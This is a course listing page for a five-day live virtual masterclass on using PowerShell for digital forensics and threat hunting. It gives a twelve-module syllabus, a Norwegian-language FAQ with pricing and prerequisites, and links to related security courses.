• Start page
  • Courses
  • Masterclass: PowerShell for Digital Investigation & Threat Hunting

Masterclass: PowerShell for Digital Investigation & Threat Hunting

During this 5-day course of super intensive training you will gain crucial cybersecurity knowledge and skills in terms of PowerShell for Digital Investigation & Threat Hunting.

You´ll be able to:

  • Get the highest quality and unique learning experience – the class is limited to 20 participants by default.
  • Get the opportunity to interact with our world-renowned Experts.
  • Go through CQURE’s custom lab exercises and practice them after the course.
  • Receive a lifelong certification after completing the course!

Why this course?

This is an international Live Virtual Class where you will be able to share the learning experience with a group of IT pros from around the world without leaving your home or office! The class is taught fully remotely in English by CQURE Cybersecurity Experts. In order to ensure the highest quality and unique learning experience, the course is limited to 16 participants by default, or supported by an assistant instructor if the number of delegates exceeds 16. During this course, you will have the opportunity to go through CQURE’s custom lab exercises, interact with our world-renowned Expert and receive a lifelong certification after completing the course!

 Target Audience

This course is designed for security professionals across offensive, defensive, and hybrid roles. Analysts, hunters, SOC teams, and incident responders will learn to enhance investigations with AI-driven workflows. Red and purple teamers will strengthen adversary emulation and detection validation, while engineers and developers gain hands-on experience building AI-powered tools, pipelines, and multi-agent systems. Security leaders and architects will benefit from practical insights into securing AI systems and addressing emerging vulnerabilities.

 

This Live Virtual Class consists of 12 Modules in terms of PowerShell for Digital Investigation & Threat Hunting. They include essential theory combined with individual practice during the exercises as well as loads of hands-on tools and real-case scenarios.

Module 1. APT Attacks & Investigation

  1. Understanding the advanced persistent threats.
  2. The attacker's tactics, techniques & procedures (MITRE ATT&CK)
  3. The APT Attack Vectors
  4. Real world scenario of Targeted Ransomware Attack

Module 2. PowerShell 101 for Blue Teams

  1. PowerShell syntax and scripting basics
  2. Cmdlets, pipelines, and execution policies
  3. Profiles and security configurations
  4. Condition Statements & Loops

Module 3. Understanding information gathering and timelining

  1. The main goals of digital forensics and timeline analysis
  2. Deep Dive into NTFS Artifacts for Hidden Malware Files
  3. Analyzing Prefetch files to detect loaded processes
  4. Extracting Timestamps from Master File Table (MFT)
  5. Hunting Deleted Malware Files via $LogFile & $UsnJrnl

Module 4. Powershell For Digital Forensics & Artifacts Collection

  1. File and directory enumeration
  2. File metadata and alternate data streams
  3. Hashing and comparing files
  4. Timestamp analysis
  5. Accessing registry keys and values
  6. Run keys & Shellbags
  7. Parsing with PowerShell scripts

Module 5. Process & Network Artifact Collection

  1. PowerShell Mapping Parent-child process relationships
  2. Verifying Process Signatures using PowerShell
  3. Command line auditing
  4. Detecting Malicious Loaded Libraries (DLLs)
  5. Network session monitoring (TCP/UDP)
  6. Netstat, Get-NetTCPConnection, and equivalents
  7. Netstat, Get-NetTCPConnection, and equivalents
  8. Dump Process's Memory using PowerShell

Module 6. PowerShell Logging & Detection

  1. PowerShell Event Logging (4104, 4688, etc.)
  2. Windows Event Log queries
  3. Detecting script block logging and encoded commands
  4. Use Sigma Rules With PowerShell To Detect Suspicious Activities

Module 7. Threat Hunting with WMI & Scheduled Tasks

  1. Querying WMI for suspicious activity
  2. Identifying attacker persistence via scheduled tasks
  3. Script-based detection of anomalies

Module 8. PowerShell For Enterprise

  1. PowerShell Remoting For Secure Data Collection & Analysis
  2. Execute Commands & Scripts Across The Enterprise
  3. Utilize Digital Forensics Tools & Libraries Like Kansa & KAPE
  4. Secure Your Connections From Stolen Credentials

Module 9. Hands-On Threat Hunting Case Study

  1. Detecting LOLBins and encoded PowerShell
  2. Hands-on lab: analyzing logs and artifacts
  3. Practical attacker techniques walkthrough

Module 10. Active Directory Enumeration with PowerShell

  1. Domain enumeration techniques
  2. AD object and group discovery
  3. Trust relationships and policies
  4. Detecting Lateral Movement Possibilities with Weak ACLs
  5. Intro To AzureAD Enumeration For Privilege Escalation

Module 11. Red Teaming Tactics with PowerShell

  1. AMSI bypasses, obfuscation, and logging evasion
  2. Attack path simulation and detection using Atomic Red Team (Purple Teaming)
  3. Living-off-the-land tools and script evasion
  4. PowerShell Without PowerShell For Defense Evasion

Module 12. Complete Fileless Attack Analysis Walkthrough

  1. Analyze an Obfuscated PowerShell 1st Stage
  2. Handling Encryption, Compression & Encoding Algorithms For Script Analysis
  3. Investigate Process Injection In PowerShell
  4. Summary, wrap-up, and Final Report

Certification

After finishing the course, you will be granted a CQURE Certificate of Completion. Please note that after completing the course you will also be eligible for CPE points!

 

FAQ – Masterclass: PowerShell for Digital Investigation & Threat Hunting

Hva koster kurset?
Prisen er 39 900 NOK for 5 dager. Kurset inkluderer kursmateriell, praktiske lab-øvelser og livslang sertifisering etter fullført kurs.

Hvor lenge varer kurset?
Kurset går over 5 intensive dager fra 09:00 til 16:00 hver dag og gjennomføres som et internasjonalt Live virtuelt kurs.

Hvordan gjennomføres kurset?
Kurset leveres som et live virtuelt kurs ledet av CQUREs cybersikkerhetseksperter. Deltakerne jobber i praktiske lab-miljøer og lærer å bruke PowerShell til digital etterforskning, trusseljakt og sikkerhetsanalyse i realistiske scenarioer.

Hvem passer kurset for?
Kurset er utviklet for tekniske sikkerhetsfagfolk som arbeider med hendelseshåndtering og trusseldeteksjon, blant annet:

  • Security analysts
  • Threat hunters
  • SOC teams
  • Incident responders
  • Red team- og purple team-spesialister
  • Security engineers
  • IT-administratorer og systemingeniører

Hva lærer jeg i løpet av kurset?
Du lærer hvordan PowerShell kan brukes til å samle inn bevis, analysere angrep og oppdage avanserte trusler i Windows-miljøer. Etter kurset vil du kunne:

  • Utføre digital etterforskning med PowerShell
  • Analysere systemartefakter og tidslinjer for hendelser
  • Samle inn og analysere prosess- og nettverksdata
  • Oppdage ondsinnede PowerShell-skript og fileless-angrep
  • Gjennomføre trusseljakt i Active Directory-miljøer
  • Automatisere analyse og etterforskning i enterprise-miljøer

Er kurset praktisk rettet?
Ja. Kurset inneholder omfattende hands-on lab-øvelser der deltakerne analyserer realistiske angrepsscenarioer, samler inn systemartefakter og gjennomfører trusseljakt ved hjelp av PowerShell.

Hvilke temaer dekkes i kurset?
Kurset dekker blant annet:

  • APT-angrep og MITRE ATT&CK-rammeverket
  • PowerShell-scripting for sikkerhetsanalyse
  • Digital forensics og artefaktinnsamling
  • Analyse av filsystemartefakter og tidslinjer
  • Prosess- og nettverksanalyse
  • PowerShell logging og deteksjon av ondsinnede skript
  • Threat hunting med WMI og scheduled tasks
  • Enterprise trusseljakt med PowerShell Remoting
  • Active Directory- og Azure AD-enumerasjon
  • Red team-teknikker og fileless-angrep

Får jeg sertifisering etter kurset?
Ja. Etter fullført kurs mottar du en livslang sertifisering som dokumenterer kompetanse innen digital etterforskning og trusseljakt med PowerShell.

Hvilke forkunnskaper anbefales?
Det anbefales at deltakerne har erfaring med Windows-infrastruktur og grunnleggende PowerShell. Kunnskap om Active Directory og IT-sikkerhet vil være en fordel.

Hva gjør dette kurset unikt?
Kurset kombinerer digital etterforskning, trusseljakt og automatisering ved hjelp av PowerShell. Du lærer hvordan moderne sikkerhetsteam bruker PowerShell til å analysere angrep, samle inn bevis og oppdage avanserte trusler i store enterprise-miljøer.

See other relevant courses to explore:

Cybersecurity & Threat Hunting

Cloud Security & Incident Response

Microsoft Security & Identity

Security Certifications

Other relevant courses

MasterClass: Hacking and Securing Windows Infrastructure
13. April
5 days
Virtual Classroom
Masterclass: System Forensics, Incident Handling And Threat Hunting
25. May
5 days
Virtual Classroom
MasterClass: Windows Security and Infrastructure Management with Windows Internals
15. June
4 days
Classroom Virtual
MasterClass: Administering and Configuring Active Directory Federation Services and Claims
15. June
3 days
Classroom